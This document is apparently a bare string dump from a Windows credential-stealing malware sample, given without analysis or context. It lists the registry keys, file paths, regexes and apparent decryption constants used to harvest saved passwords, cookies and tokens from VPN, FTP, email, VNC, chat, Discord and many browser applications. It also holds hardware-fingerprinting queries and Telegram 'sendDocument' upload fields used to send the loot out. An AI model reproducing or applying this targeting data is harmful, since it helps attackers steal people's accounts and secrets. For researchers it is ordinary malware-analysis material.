//setting[@name='Username']/value
//setting[@name='Password']/value
Private Internet Access
\account.json
.*"username":"(.*?)"
.*"password":"(.*?)"
privateinternetaccess.com
ProgramFiles(x86)
\Private Internet Access\data
%ProgramW6432%
Private Internet Access\data
FileZilla
\FileZilla\recentservers.xml
<Server>
<Host>
</Host>
<Port>
</Port>
<User>
</User>
<Pass encoding="base64">
</Pass>
<Pass>
CoreFTP
SOFTWARE\FTPWare\COREFTP\Sites
hdfzpysvpzimorhk
WinSCP
SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
HostName
UserName
PublicKeyFile
PortNumber
[PRIVATE KEY LOCATION: "{0}"]
ABCDEF
Flash FXP
Sites.dat
\FlashFXP\
quick.dat
yA36zA48dEhfrvghGRg57h5UlDv3
FTP Navigator
SystemDrive
\FTP Navigator\Ftplist.txt
No Password
Server
SmartFTP
SmartFTP\Client 2.0\Favorites\Quick Connect
WS_FTP
Ipswitch\WS_FTP\Sites\ws_ftp.ini
FtpCommander
;Password=
;User=
;Server=
;Port=
\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
\VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
\Program Files (x86)\FTP Commander\Ftplist.txt
;Anonymous=
\VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
\cftp\Ftplist.txt
FTPGetter
<server>
\FTPGetter\servers.xml
<server_ip>
</server_ip>
<server_port>
</server_port>
<server_user_name>
</server_user_name>
<server_user_password>
</server_user_password>
The Bat!
\The Bat!
\Account.CFN
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Becky!
HKEY_CURRENT_USER\Software\RimArts\B2\Settings
DataDir
Folder.lst
\Mailbox.ini
Account
PassWd
SMTPServer
MailAddress
Outlook
9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\11.0\Outlook\Profiles
Software\Microsoft\Office\12.0\Outlook\Profiles
Software\Microsoft\Office\14.0\Outlook\Profiles
Software\Microsoft\Office\15.0\Outlook\Profiles
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\16.0\Outlook\Profiles
IMAP Password
POP3 Password
HTTP Password
SMTP Password
Server
Windows Mail App
COMPlus_legacyCorruptedStateExceptionsPolicy
Software\Microsoft\ActiveSync\Partners
syncpassword
mailoutgoing
FoxMail
HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Executable
HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
FoxmailPath
\Storage\
\VirtualStore\Program Files\Foxmail\mail
\VirtualStore\Program Files (x86)\Foxmail\mail
\Accounts\Account.rec0
\Account.stg
POP3Host
SMTPHost
IncomingServer
POP3Password
Opera Mail
\Opera Mail\Opera Mail\wand.dat
opera:
ijklmno
vwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
PocoMail
\Pocomail\accounts.ini
POPPass
SMTPPass
eM Client
eM Client\accounts.dat
Accounts
"Username":"
"Secret":"
72905C47-F4FD-4CF7-A489-4E8121A155BD
"ProviderName":"
o6806642kbM7c5
Mailbird
SenderIdentities
Server_Host
Username
EncryptedPassword
\Mailbird\Store\Store.db
RealVNC 4.x
SOFTWARE\Wow6432Node\RealVNC\WinVNC4
SOFTWARE\RealVNC\WinVNC4
TightVNC
Software\TightVNC\Server
PasswordViewOnly
TigerVNC
Software\TigerVNC\Server
RealVNC 3.x
Software\ORL\WinVNC3
SOFTWARE\RealVNC\vncserver
TightVNC ControlPassword
ControlPassword
UltraVNC
\uvnc bvba\UltraVNC\ultravnc.ini
passwd
passwd2
ProgramFiles
\UltraVNC\ultravnc.ini
JDownloader 2.0
JDownloader 2.0\cfg
org.jdownloader.settings.AccountSettings.accounts.ejs
jd.controlling.authentication.AuthenticationControllerSettings.list.ejs
Paltalk
Software\A.V.M.\Paltalk NG\common_settings\core\users\creds\
nickname
paltalk.com
Pidgin
\.purple\accounts.xml
<account>
<protocol>
</protocol>
<name>
</name>
<password>
</password>
Trillian
\Trillian\users\global\accounts.dat
trillian.im
MysqlWorkbench
\MySQL\Workbench\workbench_user_data.dat
Internet Downloader Manager
Software\DownloadManager\Passwords\
EncPassword
Discord
discord.com
Discord Token
[\w-]{24}\.[\w-]{6}\.[\w-]{27}
mfa\.[\w-]{84}
Local Storage\leveldb
discordcanary
discordptb
origin_url
username_value
Opera Stable
"encrypted_key":"(.*?)"
\Local State
\Login Data
\Default\Login Data
key4.db
metaData
nssPrivate
2a864886f70d0209
2a864886f70d010c050103
key3.db
global-salt
Version
password-check
Path=([A-z0-9\/\.\-]+)
logins.json
[^\u0020-\u007F]
\"(hostname|encryptedPassword|encryptedUsername)":"(.*?)"
signons.sqlite
moz_logins
hostname
encryptedUsername
encryptedPassword
Username:
Application:
Password:
Host:
<br><hr>
<br>Username:
<br>Application:
<br>Password:
CentBrowser
CentBrowser\User Data
QIP Surf
QIP Surf\User Data
Kometa
Kometa\User Data
7Star\7Star\User Data
Iridium Browser
Iridium\User Data
CyberFox
\8pecxstudios\Cyberfox\
Edge Chromium
Microsoft\Edge\User Data
Torch Browser
Torch\User Data
Vivaldi
Vivaldi\User Data
Coowon
Coowon\Coowon\User Data
Amigo\User Data
Epic Privacy
Epic Privacy Browser\User Data
IceCat
\Mozilla\icecat\
Coccoc
CocCoc\Browser\User Data
360 Browser
360Chrome\Chrome\User Data
Sleipnir 6
Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
uCozMedia\Uran\User Data
Chedot
Chedot\User Data
WaterFox
\Waterfox\
Cool Novo
MapleStudio\ChromePlus\User Data
Firefox
\Mozilla\Firefox\
Yandex Browser
Yandex\YandexBrowser\User Data
Postbox
\Postbox\
K-Meleon
\K-Meleon\
Citrio
CatalinaGroup\Citrio\User Data
Sputnik
Sputnik\Sputnik\User Data
SeaMonkey
\Mozilla\SeaMonkey\
Elements Browser
Elements Browser\User Data
Chromium
Chromium\User Data
PaleMoon
\Moonchild Productions\Pale Moon\
Orbitum
Orbitum\User Data
BraveSoftware\Brave-Browser\User Data
Comodo Dragon
Comodo\Dragon\User Data
Liebao Browser
liebao\User Data
Opera Browser
Opera Software\Opera Stable
Thunderbird
\Thunderbird\
Chrome
Google\Chrome\User Data
BlackHawk
\NETGATE Technologies\BlackHawk\
IceDragon
\Comodo\IceDragon\
00061561
Berkelet DB
00000002
1.85 (Hash, version 2, native byte-order)
Unknow database format
SQLite format 3
UNIQUE
Cookies
Network\Cookies
host_key
expires_utc
is_httponly
is_secure
samesite
encrypted_value
cookies
cookies.sqlite
expiry
isHttpOnly
isSecure
sameSite
moz_cookies
\Default\
{0:X2}
SEQUENCE {
OBJECTIDENTIFIER
OCTETSTRING
INTEGER
Windows Credential
chrome
{{{0}}}
policy
sha512
ObjectLength
ChainingModeGCM
AuthTagLength
ChainingMode
KeyDataBlob
Microsoft Primitive Provider
:Zone.Identifier
SELECT * FROM Win32_Processor
win32_processor
processorID
3a4d2e1f-dbe7-48e7-aa47-e724eb32e86c
Win32_NetworkAdapterConfiguration
IPEnabled
MacAddress
e3651a66-854e-403f-aa28-0d76323f7a16
Win32_BaseBoard
SerialNumber
26708a57-145b-49a3-ad65-e542f21c9bc5
chat_id
caption
yyyy-MM-dd HH-mm-ss
sendDocument
document
---------------------------
multipart/form-data; boundary=
Content-Disposition: form-data; name="{0}"
Content-Disposition: form-data; name="{0}"; filename="{1}"
Content-Type: {2}
FormatID: {0}
StorageSize: {0} (0x{0:X})
Version: 0x{0:X}
{D5CDD505-2E9C-101B-9397-08002B2CF9AE}
Size of the SerializedPropertyStore is less than {0} ({1})
Version is not equal to {0} ({1})
Size of the SerializedPropertyStorage is less than 28 ({0})
Value: {0}
Type: {0}
ValueSize: {0} (0x{0:X})
Name: {0}
NameSize: {0} (0x{0:X})
Size of the StringName is not equal to {0} ({1})
Size of the NameSize is not equal to {0} ({1})
Size of the StringName is less than 9 ({0})
ID: 0x{0:X}
Size of the SerializedPropertyStore is less than 8 ({0})
StoreSize: {0} (0x{0X})
\Device\LanmanRedirector\
Failed to retrieve system handle information.
Accounts
logins